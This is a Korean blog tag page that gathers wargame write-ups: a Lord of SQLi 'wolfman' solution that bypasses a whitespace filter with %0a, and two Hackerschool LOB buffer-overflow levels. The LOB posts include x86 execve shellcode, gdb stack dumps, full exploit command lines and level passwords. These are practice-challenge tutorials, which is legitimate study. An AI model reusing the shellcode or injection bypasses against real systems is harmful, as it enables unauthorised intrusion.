'wolfman' 태그의 글 목록

1
2
3
4
5
6
7
8
9
10
11
12
13

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 
  $query = "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("wolfman"); 
  highlight_file(__FILE__); 
?>
Colored by Color Scripter

cs

if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");

공백을 필터링한다. 공백이 가능할 경우에는 1' or '1'='1' and id='admin 로 입력을 하면

query : select id from prob_wolfman where id='guest' and pw='1' or '1'='1' and id='admin'

가 되어서 admin으로 된다.

공백을 우회하는 방법은 여러가지가 있다. 아래 블로그를 참고했다.

https://binaryu.tistory.com/31

SQL Injection 공백 우회방법

SQL Injection 공격시 공백 문자 필터링시 우회 방법 1. Tab : %09 - no=1%09or%09id='admin' 2. Line Feed (\n): %0a - no=1%0aor%0aid='admin' 3. Carrage Return(\r) : %0d - no=1%0dor%0did='admin' 4. 주석 :..

binaryu.tistory.com

그 중 %0a을 이용해서 공백 필터링을 우회할 수 있었다.

저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [orge] 풀이 (0)	2019.10.28
LORD OF SQL INJECTION [darkelf] 풀이 (0)	2019.10.27
LORD OF SQL INJECTION [orc] 풀이 (0)	2019.10.25
LORD OF SQL INJECTION [goblin] 풀이 (0)	2019.10.24
LORD OF SQL INJECTION [cobolt] 풀이 (0)	2019.10.23

해커스쿨 LOB LEVEL6 [wolfman -> darkelf] 풀이

M4ndU

해커스쿨 LOB [wolfman -> darkelf] 풀이입니다.

ID | wolfman

PW | love eyuna

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

login: wolfman

Password:

[wolfman@localhost wolfman]$ bash2

[wolfman@localhost wolfman]$ ls -l

total 20

-rwsr-sr-x 1 darkelf darkelf 12655 Feb 26 2010 darkelf

-rw-r--r-- 1 root root 721 Mar 29 2010 darkelf.c

[wolfman@localhost wolfman]$ cat darkelf.c

/*

The Lord of the BOF : The Fellowship of the BOF

- darkelf

- egghunter + buffer hunter + check length of argv[1]

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

}

이번에는 argv[1]의 길이를 제안하네요. 48바이트를 넘기면 안되네요.

하지만 argv[2]를 이용한다면 해결됩니다.

argv[1] = 'print "\x90"*44+RET'`

argv[2] = 'python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\x90"*44+"\xff\xff\xff\xbf"'` `python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?

Segmentation fault (core dumped)

[wolfman@localhost tmp]$ gdb -c core -q

Core was generated by `./darkelf 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?릱릱릱릱릱릱릱릱릱릱'.

Program terminated with signal 11, Segmentation fault.

#0 0xbfffffff in ?? ()

(gdb) x/1000x $esp

0xbffffac0: 0x00000000 0xbffffb04 0xbffffb14 0x40013868

(생략)

0xbffffc00: 0x2e003638 0x7261642f 0x666c656b 0x90909000

0xbffffc10: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc20: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc30: 0x90909090 0x90909090 0xffffff90 0x909000bf

0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc50: 0xc0319090 0x2f2f6850 0x2f686873 0x896e6962

0xbffffc60: 0x895350e3 0xb0c289e1 0x0080cd0b 0x00000000

(생략)

0xbffffc40을 리턴주소로 잡으면 되겠네요.

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\x90"*44+"\x40\xfc\xff\xbf"'` `python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱@??

bash$ my-pass

euid = 506

kernel crashed

성공입니다!

분명히 되야 하는데 안될땐 bash2를 다시 띄워서 하면 되더라구요.

그럼 다음 문제로 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏ

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이 (3)	2018.02.11
해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL4 [goblin -> orc] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL3 [cobolt -> goblin] 풀이 (0)	2018.02.10

해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이

M4ndU

해커스쿨 LOB [orc -> wolfman] 풀이입니다.

ID | orc

PW | cantata

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

login: orc

Password:

[orc@localhost orc]$ bash2

[orc@localhost orc]$ ls -l

total 20

-rwsr-sr-x 1 wolfman wolfman 12587 Feb 26 2010 wolfman

-rw-r--r-- 1 root root 581 Mar 29 2010 wolfman.c

[orc@localhost orc]$ cat wolfman.c

/*

The Lord of the BOF : The Fellowship of the BOF

- wolfman

- egghunter + buffer hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

}

점점 조건들이 많아지네요...

환경변수 사용 불가능, 스택영역 사용

// buffer hunter

memset(buffer, 0, 40);

buffer의 값을 0으로 초기화 시켜서 사용할 수 없게 되었습니다.

하지만! 입력값의 크기 제한은 없죠.

쉘코드를 리턴주소 다음에 넣으면 됩니다!

dummy [44] + RET[4] + SHELLCODE

[orc@localhost orc]$ mkdir tmp

[orc@localhost orc]$ cp wolfman tmp/

[orc@localhost orc]$ cd tmp/

[orc@localhost tmp]$ ./wolfman `python -c 'print "A"*44+"\xff\xff\xff\xbf"+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA퓧릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣됀?

?

Segmentation fault (core dumped)

[orc@localhost tmp]$ gdb -c core -q

Core was generated by `./wolfman AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA퓧릱릱릱릱릱릱릱릱릱?'.

Program terminated with signal 11, Segmentation fault.

#0 0xbfffffff in ?? ()

(gdb) x/500x $esp

0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffae0: 0x90909090 0x6850c031 0x68732f2f 0x69622f68

(생략)

0xbffffc00: 0x00000000 0x00000000 0x36690000 0x2e003638

0xbffffc10: 0x6c6f772f 0x6e616d66 0x41414100 0x41414141

0xbffffc20: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffffc30: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffffc40: 0x41414141 0xffffff41 0x909090bf 0x90909090

0xbffffc50: 0x90909090 0x90909090 0x90909090 0x50c03190

0xbffffc60: 0x732f2f68 0x622f6868 0xe3896e69 0xe1895350

0xbffffc70: 0x0bb0c289 0x000080cd 0x00000000 0x00000000

(생략)

0xbffffc50으로 리턴주소를 설정하겠습니다.

[orc@localhost orc]$ ./wolfman `python -c 'print "A"*44+"\x50\xfc\xff\xbf"+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?퓧릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣됀?

?

bash$ my-pass

euid = 505

love eyuna

성공입니다. 다음레벨로 GAZUAAAAAAAAAAAAAA

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이 (3)	2018.02.11
해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이 (1)	2018.02.11
해커스쿨 LOB LEVEL4 [goblin -> orc] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL3 [cobolt -> goblin] 풀이 (0)	2018.02.10
해커스쿨 LOB LEVEL2 [gremlin -> cobolt] 풀이 (0)	2018.02.10

M4ndU의 만두만두한 블로그

wolfman

LORD OF SQL INJECTION [wolfman] 풀이

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이

'System Hacking > LOB Redhat' 카테고리의 다른 글

+ Recent posts

티스토리툴바